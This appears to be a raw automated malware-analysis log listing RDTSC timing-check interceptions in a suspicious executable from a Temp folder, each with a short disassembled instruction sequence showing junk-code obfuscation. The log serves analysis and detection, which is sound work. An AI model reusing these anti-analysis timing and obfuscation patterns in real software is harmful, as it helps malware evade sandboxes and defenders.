Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AF04A second address: 4AF07A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F742CC44206h 0x00000008 je 00007F742CC44206h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 jnp 00007F742CC44229h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F742CC44217h 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4AF07A second address: 4AF07E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4694B8 second address: 4694BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4694BC second address: 469517 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d call 00007F742CEB81D2h 0x00000012 jmp 00007F742CEB81CEh 0x00000017 pop edi 0x00000018 lea eax, dword ptr [ebp+124801B2h] 0x0000001e push 00000000h 0x00000020 push ebp 0x00000021 call 00007F742CEB81C8h 0x00000026 pop ebp 0x00000027 mov dword ptr [esp+04h], ebp 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc ebp 0x00000034 push ebp 0x00000035 ret 0x00000036 pop ebp 0x00000037 ret 0x00000038 push eax 0x00000039 push ebx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4695C9 second address: 4695CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 469A0C second address: 469A23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 469A23 second address: 469A38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007F742CC44206h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 469A38 second address: 469A42 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F742CEB81C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 469A42 second address: 469A50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CC4420Ah 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 469B17 second address: 469B21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F742CEB81C6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 469B21 second address: 469B3B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F742CC44206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007F742CC44208h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 469B3B second address: 469B7B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F742CEB81CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007F742CEB81D2h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F742CEB81D5h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 469B7B second address: 469B7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 469B7F second address: 469BB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F742CEB81D6h 0x0000000c pop esi 0x0000000d popad 0x0000000e pop eax 0x0000000f cld 0x00000010 push FC167C25h 0x00000015 push eax 0x00000016 push edx 0x00000017 ja 00007F742CEB81CCh 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 469FEC second address: 469FF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46A712 second address: 46A71F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F742CEB81C6h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46A71F second address: 46A72E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46A7D9 second address: 46A7E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46A7E8 second address: 46A831 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F742CC44208h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F742CC44208h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 lea eax, dword ptr [ebp+124801F6h] 0x0000002b mov edi, dword ptr [ebp+122D375Eh] 0x00000031 push eax 0x00000032 jc 00007F742CC44214h 0x00000038 push eax 0x00000039 push edx 0x0000003a jnc 00007F742CC44206h 0x00000040 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46A831 second address: 46A8A7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F742CEB81C8h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 add edi, 60235BE9h 0x00000029 jnp 00007F742CEB81CCh 0x0000002f lea eax, dword ptr [ebp+124801B2h] 0x00000035 mov ecx, 5B6CEE87h 0x0000003a nop 0x0000003b jng 00007F742CEB81D6h 0x00000041 jmp 00007F742CEB81D0h 0x00000046 push eax 0x00000047 pushad 0x00000048 jnp 00007F742CEB81C8h 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F742CEB81CAh 0x00000055 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4B443E second address: 4B4457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F742CC44206h 0x0000000a jmp 00007F742CC4420Fh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4B4728 second address: 4B4739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b js 00007F742CEB81C6h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4B709A second address: 4B709E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4B709E second address: 4B70AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jno 00007F742CEB81C6h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4B71D9 second address: 4B720B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 je 00007F742CC4421Ch 0x0000000b jng 00007F742CC44206h 0x00000011 jmp 00007F742CC44210h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F742CC4420Fh 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4B720B second address: 4B723E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F742CEB81D0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F742CEB81D9h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4B723E second address: 4B7253 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC4420Ch 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4B9D6F second address: 4B9D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4B9D73 second address: 4B9D7D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F742CC44206h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4B9EDC second address: 4B9EF6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F742CEB81C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jmp 00007F742CEB81CDh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BA042 second address: 4BA046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BA046 second address: 4BA04C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BE591 second address: 4BE597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BE262 second address: 4BE268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BE268 second address: 4BE26E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C362E second address: 4C3649 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81D5h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C3649 second address: 4C365A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F742CC4420Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C379C second address: 4C37A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C3A7C second address: 4C3A84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C3A84 second address: 4C3A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C3A89 second address: 4C3AB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC44219h 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F742CC44206h 0x0000000f jnl 00007F742CC44206h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C3C37 second address: 4C3C54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CEB81D9h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C3C54 second address: 4C3C58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46A1BF second address: 46A1DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 je 00007F742CEB81D1h 0x0000000b jmp 00007F742CEB81CBh 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46A1DC second address: 46A1E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46A1E0 second address: 46A1EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46A1EA second address: 46A1EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 46A1EE second address: 46A1F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C3F64 second address: 4C3F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C3F6A second address: 4C3F6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C3F6E second address: 4C3F74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C3F74 second address: 4C3F8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CEB81D4h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C412A second address: 4C412E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C412E second address: 4C413E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F742CEB81CAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C413E second address: 4C416D instructions: 0x00000000 rdtsc 0x00000002 je 00007F742CC44225h 0x00000008 jmp 00007F742CC44219h 0x0000000d jnl 00007F742CC44206h 0x00000013 jng 00007F742CC44220h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C416D second address: 4C4195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F742CEB81D4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F742CEB81CCh 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C4195 second address: 4C419A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C4C56 second address: 4C4C5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C4C5C second address: 4C4C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C4C60 second address: 4C4C68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 41F5F8 second address: 41F5FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 41F5FC second address: 41F606 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F742CEB81C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 41F606 second address: 41F612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 41F612 second address: 41F616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 41F616 second address: 41F622 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 41F622 second address: 41F634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F742CEB81CEh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 41F634 second address: 41F63A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 41F63A second address: 41F652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F742CEB81CEh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C81CE second address: 4C81F8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F742CC4420Dh 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F742CC44213h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C81F8 second address: 4C81FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C83B5 second address: 4C83B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4CE475 second address: 4CE48C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F742CEB81CFh 0x00000009 popad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4CE603 second address: 4CE607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4CE607 second address: 4CE61F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F742CEB81C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F742CEB81CCh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4CE61F second address: 4CE62F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007F742CC44206h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4CE62F second address: 4CE633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4CE633 second address: 4CE637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4CF33B second address: 4CF33F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4CF33F second address: 4CF370 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F742CC44206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d js 00007F742CC44206h 0x00000013 push esi 0x00000014 pop esi 0x00000015 popad 0x00000016 jl 00007F742CC44215h 0x0000001c jmp 00007F742CC4420Fh 0x00000021 popad 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4CF370 second address: 4CF376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4CF376 second address: 4CF37A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4CF37A second address: 4CF394 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F742CEB81C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4CF394 second address: 4CF398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4CF694 second address: 4CF6B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CEB81D8h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4CF9E2 second address: 4CFA1A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jno 00007F742CC44206h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F742CC44210h 0x00000014 jne 00007F742CC44219h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4CFD4C second address: 4CFD5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F742CEB81D2h 0x0000000a je 00007F742CEB81C6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4CFD5E second address: 4CFD97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F742CC4420Ah 0x0000000c jmp 00007F742CC44215h 0x00000011 jns 00007F742CC44206h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F742CC4420Ah 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4D48BF second address: 4D48C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
